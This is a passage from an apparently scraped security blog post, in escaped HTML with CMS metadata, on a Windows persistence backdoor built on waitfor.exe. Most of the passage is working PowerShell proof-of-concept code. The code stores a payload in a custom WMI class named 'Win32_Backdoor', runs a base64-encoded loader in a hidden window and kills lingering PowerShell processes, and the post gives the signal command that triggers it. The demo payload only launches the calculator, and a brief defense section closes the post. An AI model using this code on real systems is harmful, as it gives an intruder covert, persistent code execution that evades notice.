POC\u003C\u002Fp>\u003Ch3>Idea 1:\u003C\u002Fh3>\u003Cp>Save a PowerShell script named 1.ps1 on the target system\u003C\u002Fp>\u003Cp>The content of 1.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>start-process calc.exe\u003Cbr>cmd \u002Fc waitfor persist &amp;&amp; powershell -executionpolicy bypass -file c:\\test\\1.ps1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The escape character &amp; in PowerShell must be represented as `&amp;\u003C\u002Fp>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor persist1 &amp;&amp; powershell -executionpolicy bypass -file c:\\test\\1.ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Send signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist1\u003C\u002Fp>\u003Ch3>Approach 2:\u003C\u002Fh3>\u003Cp>Do not save files on the target system\u003C\u002Fp>\u003Cp>Here we use a technique previously introduced in 'WMI backdoor' to store the payload in a WMI class for reading and usage\u003C\u002Fp>\u003Cp>Store payload:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe\")\u003Cbr>$StaticClass.Put() \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Read payload:\u003C\u002Fp>\u003Cp>([WmiClass] 'Win32_Backdoor').Properties['Code'].Value\u003C\u002Fp>\u003Cp>The above operations are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018792403_3_2a4e2fc515-1.jpeg\">\u003C\u002Fp>\u003Cp>Execute payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Invoke-Expression to execute commands is also possible; using iex is to shorten the length\u003C\u002Fp>\u003Cp>Combined with the parameter format of waitfor, here we choose to encode the code as base64\u003C\u002Fp>\u003Cp>Base64 encode the code for executing the payload, the following code is saved in code.txt:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 encode it, the code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path code.txt\u003Cbr>$bytes = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The base64 encrypted code is as follows:\u003C\u002Fp>\u003Cp>JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\u003C\u002Fp>\u003Cp>The above operation is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018803371_4_ebfc3b1ba6-1.jpeg\">\u003C\u002Fp>\u003Cp>Testing base64 encrypted code:\u003C\u002Fp>\u003Cp>powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\u003C\u002Fp>\u003Cp>Code executed successfully, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018809918_5_f934d86d60-1.jpeg\">\u003C\u002Fp>\u003Cp>Based on the above approach, the POC is as follows:\u003C\u002Fp>\u003Cp>Backdoor code:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe ```&amp;```&amp; waitfor persist ```&amp;```&amp; powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\")\u003Cbr>$StaticClass.Put() \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>There are two layers of escape characters\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>`` is used to represent `\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Installation code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Activation command:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist\u003C\u002Fp>\u003Cp>Actual test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018815834_6_eec2f052c8-1.jpeg\">\u003C\u002Fp>\u003Cp>There is a bug causing powershell.exe to fail to exit properly, leaving the process lingering in the background\u003C\u002Fp>\u003Cp>Therefore, a piece of code needs to be added to terminate the process powershell.exe\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Based on the logical relationship, the code to terminate powershell.exe should be written before powershell -nop -W Hidden -E ...\u003C\u002Fp>\u003Cp>Finally, the complete POC code is as follows:\u003C\u002Fp>\u003Cp>Backdoor code:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()| Out-Null\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe ```&amp;```&amp; taskkill \u002Ff \u002Fim powershell.exe ```&amp;```&amp; waitfor persist ```&amp;```&amp; powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\")\u003Cbr>$StaticClass.Put() | Out-Null\u003Cbr>\u003Cbr>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Activation command:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist\u003C\u002Fp>\u003Cp>Complete demonstration as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018822287_7_3405375de8-1.png\">\u003C\u002Fp>\u003Cp>No residual process issues exist\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Pay attention to the background process waitfor.exe\u003C\u002Fp>\u003Cp>For suspicious background processes cmd.exe and powershell.exe, you can use Process Explorer to view their startup parameters, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018827167_8_45b3c689da-1.jpeg\">\u003C\u002Fp>\u003Cp>You can also read the historical echo content from the above processes. Reference materials are as follows:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fjblog.javelin-networks.com\u002Fblog\u002Fcli-powershell\u002F\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the implementation approach of the Waitfor.exe backdoor, and there may be more exploitation techniques\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1430,"Onedaysec",6,"published","2026-02-02T08:06:59.473Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Waitfor.exe Backdoor Exploitation: Persistence & POC Details","waitfor.exe, persistence, backdoor, PowerShell, penetration testing, POC, exploitation, Windows, command line, signal synchronization",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],283,282,281,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.387Z","2026-07-23T16:01:19.124Z","draft","2026-07-23T16:05:01.914Z"]